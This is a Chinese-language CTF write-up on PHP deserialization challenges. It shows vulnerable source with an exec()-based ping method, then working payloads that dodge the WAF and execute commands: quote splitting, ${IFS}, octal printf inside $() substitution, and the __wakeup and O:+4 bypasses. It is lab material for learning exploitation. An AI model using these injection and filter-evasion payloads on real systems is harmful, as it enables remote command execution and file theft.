PHP反序列化例题以及Bypass总结

unseping

题目源码

<?php
highlight_file(__FILE__);

class ease{

    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }

    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 

    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }

    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }
}

$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>

__wakeup绕过

　　　　 将需要进行反序列化的对象的序列化字符串中的成员数改为大于实际成员数即可。原理是：如果存在__wakeup方法，调用 unserilize() 方法前则先调用__wakeup方法，但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

引号 双引号绕过

(1)整体来说是创建了一个case类，然后可接受post传来的ctf的值，并对其进行base64解码以及反序列化。所以我们能控制ctf变量。

　　　 先看__wakeup方法，该方法使用waf方法对$arg中的内容进行了防护，过滤掉了| & ; 空格 / cat flag tac php ls

　　　 再看__destruct方法，该方法检测ping是否在$method中，并调用了名为$method的方法，且以数组$arg中的值作为参数。

　　　 接着看ping方法，该方法的结构为将输入参数作为外部命令进行执行，并返回输出结果。该函数实现了作为一个webshell的基本条件。

　　　 综合来看就是在通过$method和__construct来调用构造的ping方法，接着通过$args来作为输入口进行命令的输入。

 (2)post上传构造后的序列化字符串来查看目录文件，构造方法是$method=ping,$arg为想要执行的外部命令ls，ls可以用''单引号或""双引号进行绕过，注意要闭合，此处是运用了Bash shell中单双引号的特性。另外还要注意$arg是数组的形式：

payload1

$test = new ease("ping",array('l""s'));
$a=serialize($test);
$b=base64_encode($a);
echo $b

得到数据

array(2) { [0]=> string(12) "flag_1s_here" [1]=> string(9) "index.php" }

空格绕过

Linx命令中 ${IFS}

Linux的bash shell中有一个叫做内部字段分隔符IFS（internal field separator）的变量，该变量常用于在处理文本数据时作为分隔符使用。
IFS可以是White Space（空白键）、Tab（ 表格键）、Enter（ 回车键）中的一个或几个。
IFS的设置方法和普通变量设置方法类似：IFS=":"。当该变量为空格时，可用于对空格进行绕过。

payload2

$test = new ease("ping",array('l""s${IFS}f""lag_1s_here'));
$a=serialize($test);
$b=base64_encode($a);
echo $b

得到数据

array(1) { [0]=> string(25) "flag_831b69012c67b35f.php" }

Bash shell空格绕过

cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt

printf绕过（字符串进制绕过）

Linux中的printf函数（）

printf的格式化输出，可以将十六进制或者八进制的字符数字转化成其对应的ASCII字符内容输出。其格式为：

\NNN 八进制数 NNN 所代表的 ASCII 码字符。

\xHH 十六进制 HH 对应的8位字符。HH 可以是一到两位。

\uHHHH 十六进制 HHHH 对应的 Unicode 字符。HHHH 一到四位。

\UHHHHHHHH十六进制 HHHHHHHH 对应的 Unicode 字符。HHHHHHHH 一到八位

转ASCII转八绕过

cat flag_1s_here/flag_831b69012c67b35f.php

ASCII编码转为

99 97 116 32 102 108 97 103 95 49 115 95 104 101 114 101 47 102 108 97 103 95 56 51 49 98 54 57 48 49 50 99 54 55 98 51 53 102 46 112 104 112

八进制转为

\143\141\164\040\146\154\141\147\137\061\163\137\150\145\162\145\057\146\154\141\147\137\070\063\061\142\066\071\060\061\062\143\066\067\142\063\065\146\056\160\150\160

$()与反引号

　　　　在bash中，$( )与 （反引号）都是用来作命令替换的，执行括号或者反引号中的命令。命令替换与变量替换差不多，先完成引号里的命令行，然后将其执行结果作为替换，再重组成新的命令行进行执行。

示例：命令：$ echo today is $(date "+%Y-%m-%d")，首先执行date命令，然后将执行结果替换后组成新的命令$echo today is 2014-07-01进行执行。显示：today is 2014-07-01。注意$$()会将$()返回的结果视为命令进行执行，命令窗口里会有一个$。

payload3

由于php是后端语言 不会在前端显示 所以需要用printf进行输出

$test = new ease("ping",array('$(printf${IFS}"\143\141\164\040\146\154\141\147\137\061\163\137\150\145\162\145\057\146\154\141\147\137\070\063\061\142\066\071\060\061\062\143\066\067\142\063\065\146\056\160\150\160")'));
$a=serialize($test);
$b=base64_encode($a);
echo $b

在这个代码中，第一个 $ 是 Bash Shell 中的变量引用符号。当我们在命令行中输入$后跟着一个变量名时，Shell 会替换该变量为其对应的值。

在这个例子中，代码中的 $ 跟着 $(printf${IFS}"\143\141\164\040\146\154\141\147\137\061\163\137\150\145\162\145\057\146\154\141\147\137\070\063\061\142\066\071\060\061\062\143\066\067\142\063\065\146\056\160\150\160") ，意味着我们要将这个整个表达式作为命令行执行，并将命令行的输出结果作为值赋给数组的元素。

换句话说，这个代码片段中，使用$可以执行括号中的命令，并将命令的输出结果作为数组的元素。

得到结果

array(2){[0]=> string(5) " string(47) "//$cyberpeace{5e2df8ca0476abf594b980e8dc78f884}"}

得到flag

cyberpeace{5e2df8ca0476abf594b980e8dc78f884}

绕过正则表达式

(preg_match(’/[oc]:\d+:/i’, $var))

而正则匹配的规则是: 在不区分大小写的情况下 ， 若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式 ， 那么就被过滤 .很明显 ， 因为 serialize() 的参数为 object ，因此参数类型肯定为对象 " O " ， 又因为序列化字符串的格式为 参数格式:参数名长度 ， 因此 " O:4 " 这样的字符串肯定无法通过正则匹配绕过

而O:+4没被过滤说明绕过了过滤而且最后的值不变。

payload

$a=new Demo("fl4g.php");
$b=serialize($a);
$b=str_replace("O:4","O:+4",$b);   #正则绕过
$b=str_replace(":1:",":2:",$b);    #_wakeup()绕过
$c=base64_encode($b);
echo $c

O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}
Base64编码后
TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

弱比较绕过

if语句中使用双等号判断，可以想到使用弱比较

字符串在和数字比较的时候会将字符串转化为数字，当字符串开头没有数字时，则转化失败为false

构造POC

<?php
$a=array("username"=>0,"password"=>0);
$b=serialize($a);
echo $b
?>

a:2:{s:8:"username";i:0;s:8:"password";i:0;}

传参得到flag

NSSCTF{3d6b55ed-5a19-4482-87c6-68b4c8c0fb9a}